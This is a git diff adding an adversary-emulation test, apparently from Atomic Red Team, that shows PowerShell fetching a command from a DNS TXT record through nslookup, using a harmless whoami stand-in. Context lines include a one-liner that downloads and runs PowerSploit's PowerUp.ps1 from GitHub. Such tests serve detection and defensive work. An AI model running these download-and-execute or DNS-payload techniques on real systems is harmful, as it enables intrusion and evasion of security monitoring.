diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml
index 4fb4ecdc..1ea1fbf6 100644
--- a/atomics/T1059.001/T1059.001.yaml
+++ b/atomics/T1059.001/T1059.001.yaml
@@ -424,3 +424,20 @@ atomic_tests:
       iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
       Invoke-AllChecks
     name: powershell
+
+
+- name: Abuse Nslookup with DNS Records
+  auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+  description: |
+    Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+  supported_platforms:
+  - windows
+  reference : https://twitter.com/jstrosch/status/1237382986557001729
+  executor:
+    command: |
+      # creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+      # this would not be part of a real attack but helpful for this simulation
+      function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+      powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+    name: powershell
+